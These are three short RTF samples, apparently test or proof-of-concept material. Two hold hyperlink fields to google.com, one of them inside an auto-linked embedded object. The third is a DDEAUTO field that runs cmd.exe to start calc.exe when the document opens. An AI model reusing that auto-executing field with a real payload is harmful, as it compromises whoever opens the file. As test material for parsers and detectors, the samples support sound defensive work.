{\rtf1\ansi\deff0
{\fonttbl {\f0 Times New Roman;}}
{\colortbl;\red0\green0\blue0;}
\viewkind4\uc1\pard\cf1\f0\fs20 {\field{\*\fldinst{HYPERLINK "http://www.google.com"}}{\fldrslt{\ul\cf1\ulc1 Click Here}}}\par
}


{\rtf1\ansi\deff0
{\fonttbl {\f0 Times New Roman;}}
{\colortbl;\red0\green0\blue0;}
\viewkind4\uc1\pard\cf1\f0\fs20 {\object\objautlink{\*\objdata{\rtf
{\field{\*\fldinst{HYPERLINK "http://www.google.com"}}{\fldrslt{\ul\cf1\ulc1 Click Here}}}}}}
}

{\rtf1
{\field{\*\fldinst{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }}{\*\fldresult}}}

